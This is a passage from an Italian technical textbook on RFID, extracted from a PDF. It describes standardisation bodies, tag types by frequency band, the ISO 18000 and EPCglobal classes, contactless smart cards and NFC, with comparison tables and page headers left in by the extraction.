alcuni parametri tecnici:• Parametri dei due link di comunicazione a radiofrequenza,ReaderTAG e TAGReader (uplink e downlink oppure forwardlink e return link).

• Protocolli di comunicazione adoperati nei link medesimi (definizionedi procedure e formato dei dati per il dialogo).

• Tipo di modulazione dei segnali.• Codifica ed impacchettamento dei dati.• Velocità di trasmissione dei dati (bit rate), ordine di trasmissione dei bit(bit transmission order).

• Tecnica di interrogazione del Reader (ad esempio “FrequencyHopping” oppure “Listen Before Talk”).

• Procedure anti-collisione (capacità di rilevare e classificare il maggiornumero possibile di TAG allo stesso momento nell’ambito della distan-za operativa del Reader).Oltre a quanto elencato, sono necessari specifiche e standard che trat-

tino argomenti quali:• Il formato dei dati contenuti nei TAG (il modo in cui i dati sono orga-nizzati o formattati).

• La conformità (il modo in cui i prodotti rispondono ad uno standard).• Contenitori per TAG.• Applicazioni particolari (ad esempio come uno standard viene usatoper le applicazioni di trasporto).

• Protocolli “middleware” (specificano come sono processati dati e istru-zioni).Il processo di standardizzazione viene gestito sia a livello mondiale che

regionale, da due classi di organismi:• quelli che si occupano della gestione dello spettro radio, che assicura-no essenzialmente il rispetto del principio di non interferenza. A que-sta categoria appartiene l’ITU (International TelecommunicationsUnion), a livello mondiale ed in Europa un ruolo essenziale è giocatodalla CEPT (European Conference of Postal and Telecommunications

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 61

Page 57: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva62

Administrations), un organo preposto al coordinamento di 46 Paesieuropei in materia di Comunicazioni Postali e Radio. Organi dellaCEPT sono ERC (European Radiocommunications Committee) edERO (European Radiocommunications Office). L’Istituto Europeo diStandardizzazione nelle Telecomunicazioni (ETSI), invece, emette nor-mativa nelle materie omonime (essenzialmente compatibilità elettroma-gnetica).

• quelli che si occupano di interfacce di comunicazione; per assicurarel’interoperabilità tra Reader e TAG di differenti fabbricanti (a questacategoria appartengono ISO ed EPCglobal).

CLASSIFICAZIONE DEI TAG PER FREQUENZE/TECNOLOGIE

TAG INDUTTIVI LF - 120÷145 KHZ

La sottobanda operativa si trova nella parte bassa dello spettro RF, è sto-ricamente la prima banda di frequenze utilizzata per l’identificazioneautomatica e rimane ancora oggi una presenza significativa nel mercato.L’accoppiamento Reader-TAG avviene per via induttiva, con lo stesso

principio fisico dei trasformatori elettrici.Nel caso di TAG passivi la distanza operativa è all’incirca pari al dia-

metro dell’antenna del lettore e varia dai 30 cm al metro, al di là di que-sta portata il campo si riduce molto rapidamente, in ragione di 1/d3 e l’e-nergia captata dal TAG di 1/d6. Anche per questo motivo la distanza perpoter eventualmente scrivere nella memoria, operazione che richiede unmaggiore consumo di energia da parte del chip che equipaggia il TAG, ènormalmente più bassa di quella di lettura; tipicamente è inferiore del30÷50%.Va notato che all’interno della banda LF in realtà sono due le frequen-

ze operative più utilizzate:– 125,5 kHz principalmente nel settore automotive,– 134,2 kHz nella tracciabilità animale.La frequenza di 125kHz della portante è relativamente bassa e consen-

te velocità massime di trasmissione dei dati dell’ordine del migliaio di bit

I.3

I.3.1

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 62

Page 58: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID63

al secondo che possono però scendere in alcuni casi anche a 200 bit/s. Aquesta frequenza è meno diffuso il supporto di letture multiple ovvero dipiù TAG contemporaneamente presenti nel campo del lettore.I TAG a una frequenza di 134,2 kHz sono utilizzati principalmente

nella tracciabilità animale per la bassissima influenza che l’acqua ed i tes-suti hanno sulla trasmissione.Il TAG, protetto da un contenitore ceramico, viene fatto ingoiare ai

bovini e staziona in permanenza in uno degli stomaci o, racchiuso in uncontenitore di vetro, viene iniettato in posizione sottocutanea negli anima-li di dimensioni più contenute, oppure in forma di piccolo disco, vieneapplicato alle orecchie [28].

TAG INDUTTIVI HF - 13,56 MHZ

La sottobanda di frequenze è riconosciuta da tutti gli enti normatori mon-diali e questo ne ha fatto la banda più diffusa fino ai giorni nostri.L’accoppiamento Reader-TAG avviene per via induttiva, come nei

TAG LF.Le forme ed il tipo di packaging disponibili sono le più disparate ed in

Figura I.19 è riportato un limitato campionario. La configurazione tipicaprevede un’antenna formata da un avvolgimento normalmente in rame,ma viene utilizzato anche l’alluminio, formato su un substrato piatto eottenuto per incisione da un sottile foglio di metallo dello spessore di

I.3.2

Figura I.18A sinistra, TAG per uso animale: in ceramica

da inserire nello stomaco dei bovini.Al centro e a destra “food-safe” RFID TAG ,iniettabile [28] in prodotti alimentari (nella

foto un pesce), ricoperto in plasticachirurgica, dimensioni 11 x 2.7 mm, modalità

read/write, frequenze 134.2 o 125 kHz,resistente a temperature da -50°C a 160°C

pressione fino a 900 barENSID Technologies

Figura I.17Car Immobilizer

Texas Instruments

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 63

Page 59: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva64

qualche decina (60-70) di µm, oppure depositato, sul medesimo substra-to con inchiostri conduttivi. La dimensione ed il numero di spire determi-nano la sensibilità e la distanza operativa (insieme, ovviamente, alladimensione ed alla potenza emessa dall’antenna del Reader).I costi sono inferiori a quelli dei TAG LF ma strettamente dipendenti

dal tipo di supporto e dalla dimensione, così come quelli dei Reader chegodono di un buon livello di maturazione.Le ultime generazioni di chip per questa tipologia di TAG supportano

come funzionalità quasi standard i meccanismi anticollisione che consen-tono la lettura/scrittura di più TAG contemporaneamente presenti nelcampo del Reader.A differenza di quanto avviene in UHF il campo RF a 13,56 MHz non

è particolarmente influenzato dall’acqua o dai tessuti del corpo umano.La banda HF è attualmente la più usata per le cosiddette “etichette

intelligenti” (smart TAG) impiegate nella logistica e nella gestione deglioggetti, anche se, per quest’ultima applicazione si prevede che, a lungotermine, prevarranno i sistemi in banda UHF.In questa frequenza operano anche le “Smart Card contactless”, ovve-

ro carte intelligenti senza contatto che costituiscono il settore più tecno-logicamente presidiato dai produttori di chip. Le funzionalità offerte spa-

Figura I.19Le forme assunte dai TAG HF

sono le più varie e sono disponibili percoprire diverse applicazioni.

a – TAG su supporto plastico TI-RFIDb – etichetta LAB ID (Italia)c,d – TAG per uso industriale della EMS

- gruppo Datalogic (Italia)e – etichetta X-ident

Figura I.20“Etichetta intelligente” adesiva e stampabile,

incorpora TAG in banda HFLAB ID (Italia)

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 64

Page 60: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID65

ziano dalla capacità di memoria, che può andare dai pochi KByte e tocca-re oggi anche il Mbyte, alla disponibilità di algoritmi crittografici pereffettuare transazioni sicure. Quasi unicamente di tipo passivo, sonocoperte da standard quali l’ISO/IEC 14443 – detto anche di ‘proximity’,che copre da 10 a 30 cm – e l’ISO/IEC 15693, o di ‘vicinity’, per unadistanza operativa da 30 a 90 cm. Diffuse nel settore del ticketing, delcontrollo accessi del personale, della tracciabilità dei bagagli nei sistemiaeroportuali, sono le contactless smart card diventate comuni come sosti-tutivi intelligenti ed inviolabili delle schede magnetiche per le transazionibancarie (bancomat) e come carte di credito. Diversi stati le stanno intro-ducendo come passaporto elettronico.

TAG ELETTROMAGNETICI UHF MEDIA - 860÷950 MHZ

L’evoluzione tecnologica dei semiconduttori, che ha portato alla realizza-zione di chip particolarmente parsimoniosi nel consumo energetico, haconsentito la realizzazione di etichette RFID operanti a questa frequenzae con distanza operativa decisamente più estesa di quanto non fosse con-sentito con LF ed HF.L’accoppiamento Reader-TAG avviene per via elettromagnetica, come

nei tradizionali sistemi di radiocomunicazione.Una distanza operativa di 3 metri è ormai standard, ma sempre più

spesso estendibile verso cinque e più metri. Grazie a questo l’UHF mediaè destinata sicuramente a confermarsi come la banda regina della logisti-ca e, soprattutto, della gestione degli oggetti. Tuttavia alcune problemati-che, ad oggi in via di risoluzione, ne hanno rallentato l’introduzione.– Frequenze operative:Usa, Europa e Asia si trovano a dover gestire frequenze diverse: le frequen-ze già occupate dalla telefonia cellulare, e quindi ormai immutabili, nonconsentono alle tre aree geografiche di utilizzare le stesse bande per leapplicazioni RFID. Tuttavia i TAG passivi vengono spesso costruiti conaccorgimenti che ne esaltano la capacità di rispondere a “larga banda”, ilche ne consente l’operatività su bande differenti (purché non troppo) alcosto di un decadimento nelle prestazioni. Per i TAG attivi invece, se

Figura I.21TAG passivi HF per Smart CardEMS Escort Memory Systems

gruppo Datalogic (Italia)

I.3.3

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 65

Page 61: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva66

necessario gli apparati ricetrasmittenti vengono tarati su più frequenze (ascapito dei costi).

– Standard di comunicazione:sono necessari standard accettati dalla comunità internazionale per iprotocolli di comunicazione tra Reader e TAG. Il problema è statosuperato in tempi recenti dalla definizione del protocollo EPC “Class1/Generation2” e dalla relativa inclusione nello standard ISO/IEC18000-6 Type C avvenuta nel luglio del 2006.

– Potenze in trasmissione (dei Reader) e larghezza delle bande di frequenza:in Usa ed in Europa esistono differenti limitazioni per la potenza mas-sima emessa e, soprattutto, differenti larghezze della banda di frequen-za UHF dedicata; ovvero esiste un maggior numero di canali sui qualii Reader possono operare per interrogare i TAG.In logistica, questo si traduce (per gli USA) in un vantaggio competitivo(es. capacità di leggere rapidamente tutto il contenuto di una pallet) e diconseguenza un minore costo del servizio. Ciò avviene perché, potendousufruire di un numero maggiore di canali, è possibile far operare con-temporaneamente (nella stessa area) un maggior numero di Reader (cfr.algoritmo “Frequency Hopping” §IV.3.3) inoltre ciascun Reader opera aa potenza leggermente maggiore (maggiore distanza operativa).A queste frequenze (accoppiamento elettromagnetico) la quantità di

energia che il TAG raccoglie dal campo EM ricevuto, è funzione del dia-gramma di radiazione dell'antenna del TAG e della densità di potenza delcampo EM presente nella posizione del TAG.Il diagramma di radiazione dell’antenna del TAG è correlato con la lun-

ghezza d'onda del segnale e con le dimensioni fisiche dell’antenna medesima.La densità di potenza è correlata con i parametri tecnici del Reader

(potenza, antenna).Se consideriamo la frequenza di 900 MHz la lunghezza d’onda è circa

33 cm e un’antenna a ½ onda risulta lunga 16,5 cm, mentre un’antennaad ¼ d’onda risulta di circa 8,3 cm. Queste sono le dimensioni più proba-bili che ci si può aspettare per i TAG operanti in UHF media.A queste frequenze ci si scontra con problematiche più complesse di

quanto non si riscontri a frequenze inferiori:

Figura I.22TAG UHF passivo “MiniDipole”

Intermec Inc.

Figura I.23“Etichetta intelligente” con codice a barre

e varie informazioni stampate,incorpora TAG in banda UHF

Zebra Technologies Inc

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 66

Page 62: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID67

– Riflessioni: le strutture metalliche in prossimità dell’antenna possonoriflettere le onde elettromagnetiche; queste riflessioni possono, incon-trandosi con l’onda diretta dell’antenna in opposizione di fase, genera-re degli spazi in cui il campo elettromagnetico risulta nullo. I TAG inqueste aree risultano illeggibili. Una modellazione di queste situazioniè trattata in §III

– Liquidi: l’assorbimento da parte dell’acqua delle onde elettromagneti-che si fa più consistente. L’efficienza di lettura in ambienti particolar-mente umidi o con TAG applicati a contenitori di liquidi può diventa-re difficoltosa.Essendo l’UHF media, grazie alla sua distanza operativa, la frequenza

di elezione per la logistica, i rispettivi TAG dovrebbero arrivare, grazieall’esplosione attesa nei volumi di produzione, ad avere il costo più basso.La velocità di trasmissione risulta superiore a quella dei sistemi operan-

ti a frequenze più basse. I sistemi, inoltre, sono in grado di gestire letturemultiple contemporanee (anticollisione) arrivando alla lettura di più di100 TAG al secondo. Le caratteristiche (tecnologiche e dell’algoritmo dianticollisione) di TAG conformi alle specifiche EPC/ISO Class1/Gen2dovrebbero consentire, in linea teorica, la lettura di 600 (in Europa) e1.500 (in USA) TAG/s che si presentino contemporaneamente al lettore.Il supporto da parte dei fornitori di tecnologia si va facendo via via più

consistente, con un sempre maggior numero di fornitori e con amplia-mento della possibilità di scelta sia sulle capacità di memoria dei chip chesulla possibilità di avere TAG passivi, attivi o semipassivi.

TAG ELETTROMAGNETICI UHF ALTA E SHF - BANDA 2,4 GHZ

Nella banda dei 2,4 GHz operano già le reti wireless (WLAN, Bluetooth,ZigBee) con cui è necessario programmare la convivenza.Come per l’HF, queste bande sono già riconosciute a livello mondiale

come frequenze dedicate anche alla tecnologia RFID.Hanno comportamento e caratteristiche molto simili all’UHF e, grazie al

legame tra dimensione d’antenna e lunghezza d’onda, consentono di ridur-re la dimensione dell’antenna del TAG permettendo una ulteriore miniatu-

I.3.4

Figura I.24TAG passivo, banda 2,4 GHz,

dimensioni 30x6 mm, in contenitore rigidoper uso in aria libera

Intermec Inc.

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 67

Page 63: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva68

rizzazione del medesimo. Alla riduzione dell’antenna corrisponde però unariduzione della capacità di captare energia dal campo EM incidente.Per contro il campo EM può essere più facilmente direzionabile anche con

antenne molto compatte ottenendo aree di lettura molto ristrette e direziona-li. Le funzionalità non si discostano da quelle dei TAG UHF: attivi, semi-pas-sivi e passivi; con memoria da 64/96 bit (semplice dispositivo di ID) a diversiKbytes e scelta tra “ReadOnly” (tipicamente ID), “WORM” (dispositivi“WriteOnce ReadMany” o “one time field programmable”) e “Read/Write”.

CLASSIFICAZIONE DEI TAG PERSTANDARD/FREQUENZE/APPLICAZIONI

I.4Figura I.25

Classificazione dei TAG perStandard/Frequenze/Applicazioni

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 68

Page 64: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID69

IDENTIFICAZIONE DI ANIMALI

Gli standard ISO 11784, ISO 11785 ed ISO 14223 definiscono i TAG perl’identificazione degli animali, nelle bande al di sotto dei 135 kHz. Lostandard originale definisce solo un identificatore fisso di 64 bit. Lo stan-dard più recente (ISO 14223) definisce blocchi di dati riscrivibili oppureprotetti da scrittura. Il protocollo di comunicazione dell’ISO 14223 èsimile a quello dei TAG RFID definiti in ISO/IEC 18000-2 che verrannodescritti nel seguito.

LOGISTICA ED IDENTIFICAZIONE DI OGGETTI

L’impiego principale dei TAG RFID è quello dell’identificazione di ogget-ti e più in generale della logistica (identificazione di imballaggi, pallet,container e quant’altro lungo la catena di distribuzione). Gli standard perquesto tipo di applicazioni fanno capo a due organismi i cui elaboratistanno convergendo:- EPCglobal nato ed operante come una associazione privata (cfr. §IX.2.1);- ISO (ed organismi ad esso collegati) che costituisce l’ente mondiale dinormativa in quasi tutti i campi della tecnologia.Ad esempio gli standard per l’interfaccia radio sono, ad oggi, proposti sia

da ISO che da EPCglobal (probabilmente l’uno orientato su tutti i campi,l’altro polarizzato sulle esigenze specifiche della catena di distribuzione).Gli standard EPCglobal coprono anche i livelli applicativi, mentre la

serie ISO/IEC 18000 si limita all’interfaccia radio. Da poco anche in ISOvengono prodotti standard applicativi per impieghi particolari.EPCglobal definisce standard per varie classi di TAG:

- Classe 0 – Generation 1, considerati obsoleti, a 900 MHz, passivi, sonoi tipi più semplici, per sola lettura (read-only), ove i dati, generalmenteil solo identificatore (EPC), sono scritti durante il processo di produ-zione e sono quindi immodificabili. La classe 0 definisce anche unacategoria di TAG chiamati EAS (Electronic Article Surveillance) oppu-re antifurto (anti-theft). Questi ultimi TAG non hanno identificatorecompleto ma annunciano solo la loro presenza quando transitano nelcampo generato dal Reader.

I.4.1

I.4.2

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 69

Page 65: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

- Classe 1 – Generation 1, considerati obsoleti, a 13,56 oppure a 900MHz, passivi, sono costruiti senza dati scritti in memoria. I dati posso-no essere scritti una sola volta dall’utente o in fabbrica, successivamen-te è possibile la sola lettura.

- Classe 1 – Generation 2, a 900 MHz, passivi, scrivibili una sola volta;standard innovativo, recepito dall’ ISO/IEC 18000-6 Type C, che com-prende ed amplia le caratteristiche delle classi 0 ed 1.

ISO, dal canto suo ha definito una serie di standard per i TAG desti-nati alla gestione degli oggetti ed alla logistica, la serie 18000 (RFID foritem management). Tale serie definisce l’interfaccia radio, i meccanismianti-collisione, i protocolli di comunicazione per TAG in differenti bandedi frequenza.- La parte 1 definisce l’architettura di riferimento.- Le parti dalla 2 alla 7 definiscono le caratteristiche per le differenti fre-quenze. In particolare:

- La parte 2 definisce i TAG a frequenze <135 kHz.- La parte 3 definisce:• 3-1 TAG HF (13,56 MHz) ed è compatibile con ISO/IEC 15693.• 3-2 Sistemi RFID di nuova generazione nella stessa banda di frequen-za, ma con maggior velocità di trasferimento dati (fino a 848 kbit/s)e lettura veloce di gruppi di TAG.

- La parte 4 definisce sistemi a 2,45 GHz:• “modo 1” sistemi passivi in backscatter;• “modo 2” sistemi con TAG attivi ad alto data rate.

- La parte 6 definisce sistemi passivi in backscatter nelle bande dei 900MHz:• Type A & type B, che differiscono per la diversa codifica dei dati edil differente protocollo anticollisione.

• Type C, che recepisce le specifiche EPCglobal class1 generation2.- La parte 7 definisce un sistema RFID a lungo raggio con TAG attivinella banda dei 433 MHz.

RFID - Fondamenti di una tecnologia silenziosamente pervasiva70

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 70

Page 66: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

CARTE ELETTRONICHE SENZA CONTATTO

Un tipo particolare di TAG a radiofrequenza è costituito dalle carte elettro-niche a microchip senza contatto. A loro volta, queste sono tipologie partico-lari delle carte elettroniche (con e senza contatto) definite dallo standardISO/IEC 7810. Sono definiti tre tipi di carte senza contatto in funzione dellaloro distanza operativa.- Close-coupled cards (ISO/IEC 10536)Operano a distanza dal Reader inferiore ad 1 cm. Hanno diffusionelimitata, poiché offrono pochi vantaggi rispetto agli standard più recen-ti. Questo standard sta ormai divenendo privo di interesse in quantosuperato, in termini di prestazioni, dai due standard citati qui di segui-to e non vede che sporadiche realizzazioni a livello mondiale.

- Proximity cards (ISO/IEC 14443)Operano a distanza dal Reader inferiore a 10 cm. Generalmente sonodotate di microprocessore e possono essere assimilate a TAG RFID difascia alta ed agli NFC (cfr. §I.4.4). Queste carte possono implementa-re applicazioni complesse come il Ticketing. Esistono due differentistandard (Tipo A e Tipo B) per l’interfaccia radio, l’inizializzazione el’anti-collisione. La parte 4 dello standard descrive il protocollo dellostrato di collegamento (link layer), simile a quello delle carte a contat-to (ISO/IEC 7816-3) e che consente lo scambio (tra Reader e TAG) diunità dati (Application Protocol Data Units - APDUs). Su queste cartesono spesso sviluppati dei protocolli applicativi proprietari, ad esempioil “MIFARE” (Philips) o “FeliCa” (Sony).

- Vicinity cards (ISO/IEC 15693)Operano a distanza dal Reader fino a circa 1,5 m. Generalmenteincorporano una logica di controllo più semplice del microproces-sore incorporatro nelle carte 14443, come la maggior parte deiTAG RFID. Queste carte possono essere usate per identificazionee semplici applicazioni come il controllo di accesso. Lo standarddescrive l’interfaccia radio, l’anti-collisione ed il protocollo di tra-smissione (link layer).

PARTE I - INTRODUZIONE AGLI RFID71

I.4.3

41-92.qxp:RFID 9-09-2008 11:36 Pagina 71

Page 67: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

NEAR FIELD COMMUNICATION (NFC)

La famiglia degli NFC (Near Field Communication) è composta da siste-mi in rapido sviluppo. Si tratta di apparati derivati dalle tecnologie dellecarte senza contatto e degli RFID, progettati per interazioni a “corto rag-gio” (<10 cm) nella banda dei 13,56 MHz.Near Field Communication (NFC) rappresenta la seconda generazione

delle tecnologie RF di prossimità senza contatto (contactless) che includela comunicazione peer-to-peer (cioè tra due pari) e che abilita l’accessosicuro (sul modello smart card) a diverse tipologie di servizi (cashless pay-ment, ticketing, on-line entertainment and access control) mediante ter-minali fissi o mobili.Un NFC è tipicamente formato dall’accoppiamento (in un solo circuito)

di un Reader (attivo) e di un TAG (passivo e/o attivo) con caratteristicheoperative compatibili con le carte senza contatto del tipo “Proximity cards”ISO 14443, adatte quindi a scambio dati sicuro ed a pagamenti elettronici.

L’idea innovativa consiste proprio nell’accoppiamento di Reader eTAG in tutti gli apparati.I sistemi NFC, infatti, superano la distinzione tra Reader e TAG e

RFID - Fondamenti di una tecnologia silenziosamente pervasiva72

Figura I.26Tipologie di applicazioni NFC

I.4.4

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 72

Page 68: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

quella tra apparati attivi e passivi, poiché sono in grado di operare sia in“Active mode” (ogni nodo NFC genera il suo campo in radiofrequenzaper trasmettere dati), sia in “Passive mode” (solo uno dei due dispositivigenera un campo RF, come avviene per i sistemi RFID passivi). Essendoquindi integrate, in uno stesso chip, le funzioni di Reader e di smart cardsenza contatto, il singolo NFC può operare sia in modalità attiva, sia comeTAG passivo, sia in “Card Emulation Mode”.Questo consente una tipologia di comunicazione peer to peer inedita.

L’apparato che vuole effettuare la transazione verso un altro apparato,infatti, comandato dall’utente ed avvicinato da questo alla giusta distanzaoperativa, “sveglia” il suo potenziale corrispondente attraverso l’interro-gazione di un Reader ad un TAG passivo. A questo punto la comunica-zione può proseguire sia in modo attivo–passivo (per assumere informa-zioni dall’oggetto), sia in modo attivo–attivo, compiendo tutte le procedu-re per effettuare scambio di dati con un canale sicuro (per effettuare paga-menti, tiketing, controllo accessi, ecc.).L’NFC, per operare, viene inserito in un apparato elettronico che prov-

vede sia all’interfaccia uomo macchina (se necessaria), sia al collegamen-to in rete con i sistemi centrali di transazione finanziaria, sia a fornire l’e-nergia per il funzionamento.Dal lato utente l’NFC è tipicamente incorporato in un telefono cellula-

re o in un PDA, dal lato del terminale per ticketing o pagamento merci,l’NFC sarà incorporato in obliteratrici di biglietti, parchimetri, terminaliPOS, tornelli d’ingresso, ecc.; per la struttura del sistema, la transazionepotrebbe anche essere realizzata tra due terminali d’utente.Il vantaggio per l’utente consiste nel poter effettuare i pagamenti con

una sorta di proprio bancomat portatile, in grado di essere controllato efornire informazioni, anziché con un carta di credito o un bancomat ope-rante su terminale POS esterno, entrambi “muti” nel senso che la trans-azione può essere controllata solo a posteriori.Il ruolo dell’NFC è quello di “embedded system”; una tecnologia inte-

grata, un sistema aggregato ad un altro; le sue funzioni sono quelle di“apparato abilitante” per altri sistemi e/o applicazioni. L’NFC sostituisceuna complessa interazione uomo macchina che normalmente è necessaria

PARTE I - INTRODUZIONE AGLI RFID73

Figura I.27NFC + telefonino; “Il tocco magico”

41-92.qxp:RFID 9-09-2008 11:36 Pagina 73

Page 69: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

per attivare un’applicazione. Si pensi, ad esempio, alle chiavi elettroniche:l’NFC non è la chiave per aprire la serratura (anche se può ospitarla) maopera funzoni ausiliarie: “sveglia” o “viene svegliato” dalla serratura, lariconosce e pertanto può trovare, tra quelle possedute, la chiave giusta peraprire quella particolare serratura, mette in piedi un canale sicuro per pas-sare la chiave alla serratura. Tutte queste funzioni non sono quindi la chia-ve che apre la serratura, ma mettono in condizioni di usare la chiave inmodo agevole, rapido e sicuro.La stessa cosa si può dire per le applicazioni più “celebri” dell’NFC: il

ticketing ed i pagamenti elettroniciA questo proposito, come in tutte le operazioni finanziarie elettroni-

che, da entrambi i lati della transazione è necessario disporre di “portafo-gli” dai quali il denaro rispettivamente esce ed entra. Ad oggi la quasitotalità dei “portafogli elettronici” richiede un collegamento in rete perpoter operare.Se dal lato del terminale per ticketing o pagamento merci possono esse-

re usate le tecniche più varie (fisse o mobili), dal lato del terminale d’uten-te (mobile) un buon modo di attuare i collegamenti in rete con i “porta-fogli” sono le SIM di telefonia mobile o gli accessi wireless ad Internet.Infatti per la realizzazione dei “portafogli utente” possono essere usate(ma in Italia sussistono ancora problematiche di tipo normativo) le SIMdi telefonia mobile (che di per sé sono adatte a piccole transazioni finan-ziarie adoperando come portafoglio il credito telefonico) il che costituisceuna novità che si affianca al sempre possibile uso delle carte di credito odebito (bancomat) con accesso dalla rete mobile.Il ruolo dell’NFC, pertanto, non è quello di eseguire la transazione finan-

ziaria, ma quello di mettere in comunicazione le parti in modalità “sicura”.Gli standard NFC sono definiti, in modo identico, in ISO ed ECMA,

parzialmente anche in ETSI (cfr. §V.5.2). In particolare il protocollo(NFCIP-1) per la “Communication Interface” degli NFC è definito inISO 18092, mentre il protocollo per la compatibilità con le carte senzacontatto (NFCIP-2) è definito in ISO 21481 (cfr. §IX.4.4).Il sistema, però, ha anche bisogno di normativa che garantisca un

approccio standard sia per quanto riguarda le procedure di sicurezza, sia

RFID - Fondamenti di una tecnologia silenziosamente pervasiva74

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 74

Page 70: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

per la comunicazione, a livello applicativo, tra l’NFC, l’apparato che loospita (telefonino), la SIM (o altro) che gestisce la comunicazione in retee l’organizzazione che gestisce il “portafoglio elettronico”.Infine, a fronte dei vantaggi, le maggiori perplessità per lo sviluppo

degli NFC, sono le medesime che afferiscono alle carte senza contatto. Aldi la degli standard pubblicati, infatti, molte delle procedure effettiva-mente necessarie per operare una transazione attraverso un sistema NFCrichiedono sistemi proprietari (valga per tutti la sicurezza assicurata conprocedure di tipo Mifare).

TABELLA DI CONFRONTO TRA SMART CARD SENZA CONTATTO, NFC E

TAG RFID

PARTE I - INTRODUZIONE AGLI RFID75

I.4.5

Tabella I.2Confronto tra smart card senza contatto, NFC e TAG RFID

41-92.qxp:RFID 9-09-2008 11:36 Pagina 75

Page 71: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva76

TABELLA DI CONFRONTO DI TAG PER FREQUENZE OPERATIVE/STANDARDI.4.6

Tabella I.3Confronto di TAG per Frequenze operative / Standard - Copyright [2]

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 76

Page 72: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

PARTE I - INTRODUZIONE AGLI RFID77

4.6.1 Altre frequenze

- UHF bassa 433 MHz, standard ISO/IEC 18000-7 per TAG attivi, distan-za operativa: 1÷100 m, applicazioni: SRD, sistemi di radiolocalizzazione.

- SHF: 5,725÷5,825 GHz in EU; 5,850÷5,925 GHz in USA, con tecnichedi modulazione di tipo tradizionale. È la banda su cui, in Italia opera ilTelepass. Sembrava fosse oggetto di uno standard ISO (ISO/IEC18000-5 – Parameters for Air Interface Communications at 5.8 GHz)che in seguito è stato ritirato. Pur essendo definita sia in Italia che negliUSA, sembra debba essere abbandonata per l’uso con RFID a modula-zione tradizionale, a favore di tecnologie più moderne (UWB).

- SHF: 5,9÷7,4 GHz con tecniche di modulazione di tipo Ultra WideBand (UWB) tecnologia sperimentale a banda larga. Sarà presto ogget-to di realizzazioni industriali e proposte di normativa.

TABELLE E GRAFICI DI CONFRONTO DI TAG PER FREQUENZE/PRESTAZIONI

Questo paragrafo riassume con grafici e tabelle le prestazione e le capaci-tà dei TAG, nonché la loro distribuzione nelle varie frequenze operative.

I.4.7

Tabella I.4Confronto di TAG per Frequenze/Prestazioni

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 77

Page 73: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

RFID - Fondamenti di una tecnologia silenziosamente pervasiva78

I primi tre tabelle/grafici proposti, illustrano i confronti riassuntivi tra leprestazioni dei TAG distinti per frequenza (Tabella I.4) o per tecnologia(Figura I.28), oppure per funzionalità e capacità di memoria (Figura I.29).

In conclusione del paragrafo vengono proposte previsioni per quantoconcerne la Distribuzione dei sistemi nelle frequenze.

Figura I.29Comparazione dimensioni di memoria/

funzionalità del TAG[Klaus Finkenzeller, “RFID Handbook:

Fundamentals and Applications inContactless Smart Cards and Identification,

Second Edition”, WILEY 2003].

Figura I.28Confronto tra caratteristiche di TAG Passivi,

Semi Passivi, Attivi

2-ParteI.qxp:RFID 5-09-2008 10:53 Pagina 78

Page 74: RFID - Fondazione Bordoni - Rfid Fondamenti Tecnologia 2Ed

I grafici di Figura I.30 sintetizzano la distribuzione dei sistemi ad oggirealizzati nelle diverse frequenze. Il grafico di sinistra illustra le percen-tuali, divise per frequenze, dei TAG installati, a livello mondiale nel 2008;il grafico di destra illustra le percentuali, divise per frequenze, dei TAG ilcui impiego risulti previsto dall’analisi di quasi 2.000 progetti di sistemiRFID sviluppati a livello mondiale in anni recenti e precedenti il 2008.Quindi mentre a sinistra si fotografa il mercato attuale, a destra si

dovrebbe rappresentare una proiezione a breve del mercato medesimo.Si nota, ancora oggi, una forte prevalenza della tecnologia HF, mentre

nei progetti cresce l’ipotesi d’impiego dell’UHF. Il divario tra progetti erealizzazioni in LF è probabilmente dovuto al fatto che molti dei proget-ti di identificazione di animali non vanno poi a buon fine, anche se que-st’applicazione cresce di anno in anno.Nettamente distanziati risultano applicazioni e progetti nell’UHF alta

o in altre frequenze, sia per la ridotta applicabilità, sia perché in alcuneregioni (tra cui l’Europa) vengono realizzate poche applicazioni in que-ste bande.

COSTI INDUSTRIALI DEI TAG

Il costo dei TAG passivi è ritenuto il principale fattore abilitante per unadiffusione massiva della tecnologia RFID nella catena di distribuzione.Per quanto riguarda i costi “minimi” (etichette in pakage a basso

costo ed in produzione massiva) un traguardo (da tempo citato come un

